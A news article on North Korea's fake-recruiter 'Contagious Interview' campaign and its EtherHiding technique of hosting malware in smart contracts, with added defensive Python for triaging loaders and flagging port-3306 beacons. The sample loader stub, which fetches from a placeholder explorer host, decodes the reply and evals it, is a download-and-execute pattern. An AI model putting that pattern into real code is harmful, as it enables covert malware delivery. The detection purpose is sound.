North Korea Weaponizes Blockchain For Stealth Hacks, Poses As Job Recruiters
- The group deployed a new JavaScript module that combines BeaverTail and OtterCookie malware, featuring keylogging and screenshot capabilities.
- Attackers retrieve payloads using read-only function calls that avoid transaction fees and leave no visible blockchain history.
- Attackers controlling contracts can update payloads at any time, changing attack methods or deploying different malware simultaneously.
- Victims download malicious files from GitHub repositories during technical assessments, triggering multi-stage infections.
What Happened
This discovery comes as North Korean hackers stole over $1.3 billion across 47 incidents in 2024 and $2.2 billion in the first half of 2025 alone, funding the regime’s weapons program through elaborate money laundering networks.
These companies fronted the “Contagious Interview” campaign, which is run by a Lazarus Group subgroup specializing in malware deployment.
Why It Matters
North Korean threat group Famous Chollima is using blockchain technology to hide malware payloads in smart contracts, which marks the first documented case of a nation-state actor adopting “EtherHiding” techniques.
Cisco Talos and Google Threat Intelligence Group independently confirmed the attacks target job seekers through fake interview processes, deploying malware that steals crypto and credentials.
Details
The malicious software was distributed via a Node.js package named “node-nvm-ssh” on the official NPM repository, disguised as a chess application called “Chessfi.”
Google has documented a North Korean group, UNC5342, which has been embedding JADESNOW malware and INVISIBLEFERRET backdoors within smart contracts on the BNB Smart Chain and Ethereum since February 2025.
The technique stores malicious payloads on public blockchains, creating a decentralized command-and-control infrastructure that cannot be taken down by law enforcement.
EtherHiding Turns Blockchain Into Bulletproof Hosting Platform
EtherHiding embeds malicious JavaScript payloads within smart contracts on public blockchains, turning decentralized ledgers into resilient command-and-control servers.
The technique gives attackers decentralized storage that resists takedowns, pseudonymous transactions that obscure their identity, and immutable smart contracts that cannot easily be removed.
Google Threat Intelligence documented UNC5342 using EtherHiding in the “Contagious Interview” campaign, where fake recruiters impersonate companies like Coinbase and Robinhood.
The JADESNOW downloader queries BNB Smart Chain through API providers like Binplorer to retrieve payloads from smart contract address 0x8ea**8a71c.
The contract has been updated over 20 times within four months, costing an average of $1.37 in gas fees per update.
Blockchain explorers show on-chain transactions containing Base64-encoded and XOR-encrypted messages that decrypt to heavily obfuscated JavaScript payloads.
The malware pivots between networks, querying Ethereum transaction history through multiple explorer APIs, including Blockchair, Blockcypher, and Ethplorer.
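The loader pattern described in this section and the encoding described above (read-only lookups against public explorer APIs, a Base64 layer over an XOR layer, then execution of the recovered JavaScript) can be triaged statically without ever touching a chain. The following is an added example written for this article, not code from Cisco Talos, Google Threat Intelligence or any project named here. It scores a JavaScript file for the explorer-name, decode and dynamic-execution indicators the text describes, and decodes a recovered on-chain message by stripping Base64 and then brute-forcing a single-byte XOR key; the single-byte key length is an assumption for illustration (the article does not state the key size), and every sample input is constructed inline.

```python
"""Triage helpers for EtherHiding-style JavaScript loaders (added example;
not vendor, Talos or GTIG code). All sample inputs are constructed here."""
import base64
import re
import string

# Explorer services the article says the loader queries. Matching on the
# service names rather than exact API hostnames avoids assuming any URL.
EXPLORER_NAMES = ("binplorer", "blockchair", "blockcypher", "ethplorer")

# Generic building blocks a decode-then-execute loader needs.
BASE64_DECODE = re.compile(r"\batob\s*\(|Buffer\.from\s*\([^)]*['\"]base64['\"]", re.I)
XOR_LOOP = re.compile(r"charCodeAt\s*\([^)]*\)\s*\^|\^\s*\w+\.charCodeAt", re.I)
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|runInThisContext\s*\(|runInNewContext\s*\(")


def triage_js(source):
    """Static indicators of a blockchain-hosted, decode-then-execute loader."""
    lowered = source.lower()
    explorer_refs = [name for name in EXPLORER_NAMES if name in lowered]
    findings = {
        "explorer_refs": explorer_refs,
        "base64_decode": bool(BASE64_DECODE.search(source)),
        "xor_loop": bool(XOR_LOOP.search(source)),
        "dynamic_exec": bool(DYNAMIC_EXEC.search(source)),
    }
    # Verdict: remote blob fetched from an explorer, decoded, then executed.
    findings["suspicious"] = bool(explorer_refs) and findings["base64_decode"] and findings["dynamic_exec"]
    return findings


JS_TOKENS = ("function", "var ", "const ", "let ", "require(", "return", "=>", "eval(", "process.")
PRINTABLE = set(string.printable.encode())


def xor_bytes(data, key):
    """Repeating-key XOR (its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def js_likeness(candidate):
    """Crude score: must be almost entirely printable, then count JS keywords."""
    printable = sum(1 for b in candidate if b in PRINTABLE) / max(len(candidate), 1)
    if printable < 0.9:
        return 0.0
    text = candidate.decode("ascii", errors="ignore").lower()
    return printable + sum(text.count(tok) for tok in JS_TOKENS)


def decode_onchain_blob(blob_b64, key=None):
    """Base64-decode a recovered on-chain message, then strip the XOR layer.

    With no key, try every single-byte key (an assumed key length, not
    something the article states) and keep the most JavaScript-like result.
    Returns (key, decoded_text)."""
    raw = base64.b64decode(blob_b64)
    if key is not None:
        return key, xor_bytes(raw, key).decode("utf-8", errors="replace")
    best_key, best_text, best_score = None, "", -1.0
    for k in range(256):
        candidate = xor_bytes(raw, bytes([k]))
        score = js_likeness(candidate)
        if score > best_score:
            best_key, best_text, best_score = bytes([k]), candidate.decode("utf-8", errors="replace"), score
    return best_key, best_text


# Constructed samples (hypothetical placeholder host, not a real endpoint).
SAMPLE_LOADER = """
// constructed loader stub: explorer lookup, Base64 + XOR decode, then eval
const body = await fetch('https://ethplorer.example/tx/0xPLACEHOLDER').then(r => r.text());
const raw = Buffer.from(body, 'base64').toString('binary');
let out = '';
for (let i = 0; i < raw.length; i++) out += String.fromCharCode(raw.charCodeAt(i) ^ 0x5a);
eval(out);
"""
SAMPLE_BENIGN = """
const express = require('express');
const app = express();
app.get('/', (req, res) => res.send('hello'));
"""
# A harmless JS stub, XOR-ed with key 0x5a and Base64-encoded here to stand in
# for a recovered on-chain message.
SAMPLE_PLAINTEXT = b"function run(){ var x = require('os'); return x.hostname(); }"
SAMPLE_KEY = bytes([0x5A])
SAMPLE_BLOB = base64.b64encode(xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)).decode()

if __name__ == "__main__":
    print(triage_js(SAMPLE_LOADER))
    print(triage_js(SAMPLE_BENIGN))
    print(decode_onchain_blob(SAMPLE_BLOB))
```

The static score is deliberately conservative: an explorer name alone is normal in wallet tooling, so the verdict requires the fetch, the decode and the execution of the decoded result to appear together. The decoder is an analyst aid for a blob already pulled from a transaction record; it never contacts a chain or explorer itself.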
The final INVISIBLEFERRET.JAVASCRIPT payload connects to command-and-control servers via port 3306, sending victim hostname, username, operating system, and current directory.
The backdoor supports arbitrary command execution, file exfiltration, and directory harvesting, and it targets over 80 browser extensions, including MetaMask and Phantom.
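The beaconing behaviour described above (a script runtime opening an outbound connection on port 3306, a port normally owned by MySQL clients talking to a database) is the kind of thing a host connection log can surface. The following is an added example for this article, not code from any vendor or from Talos or GTIG. It parses a constructed, simplified connection-log format and flags outbound TCP/3306 connections from Node or Python processes to addresses outside the RFC1918 and loopback ranges; internal database traffic on the same port is deliberately excluded, which is the main false-positive source for a rule like this.

```python
"""Connection-log rule for script runtimes beaconing on TCP/3306 (added
example; the log format and every event below are constructed)."""
import ipaddress

# Constructed sample lines: "timestamp process pid direction dst_ip:dst_port"
SAMPLE_EVENTS = [
    "2025-03-01T10:00:01Z mysqld 4120 in 10.0.0.5:3306",
    "2025-03-01T10:00:07Z node 5133 out 10.0.0.9:3306",
    "2025-03-01T10:00:12Z node 5133 out 203.0.113.45:3306",
    "2025-03-01T10:00:15Z chrome 2201 out 198.51.100.7:443",
    "2025-03-01T10:00:20Z python3 6001 out 203.0.113.45:3306",
    "2025-03-01T10:00:25Z mysql 7002 out 203.0.113.80:3306",
]

# Runtimes that should rarely speak to an external MySQL port directly.
SCRIPT_RUNTIMES = {"node", "node.exe", "python", "python3", "python.exe"}
SUSPECT_PORT = 3306
# Explicit internal ranges; ipaddress.is_private also covers documentation
# ranges, which we want to treat as external for the sample data.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
]


def parse_event(line):
    """Split one constructed log line into a dict with typed fields."""
    ts, proc, pid, direction, dst = line.split()
    ip, port = dst.rsplit(":", 1)
    return {"ts": ts, "proc": proc, "pid": int(pid), "dir": direction,
            "ip": ipaddress.ip_address(ip), "port": int(port)}


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def flag_beacons(lines):
    """Return events where a script runtime connects out to an external host on 3306."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev["dir"] != "out" or ev["port"] != SUSPECT_PORT:
            continue
        if is_internal(ev["ip"]):
            continue  # ordinary app-to-database traffic inside the network
        if ev["proc"].lower() in SCRIPT_RUNTIMES:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for hit in flag_beacons(SAMPLE_EVENTS):
        print(f"{hit['ts']} {hit['proc']}[{hit['pid']}] -> {hit['ip']}:{hit['port']}")
```

The process allowlist is the tunable part: a genuine MySQL client reaching an external database is left alone, while a developer's Node or Python process doing the same thing is worth a look, especially on a machine that recently ran a "take-home assessment" from an npm package.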
Fake Companies and Stolen Identities
Earlier this year, it was discovered that North Korean operatives established legitimate US corporations using fake identities to create credible corporate fronts.
Silent Push researchers discovered Blocknovas registered to a vacant lot in South Carolina, while Softglide traced back to a Buffalo tax office.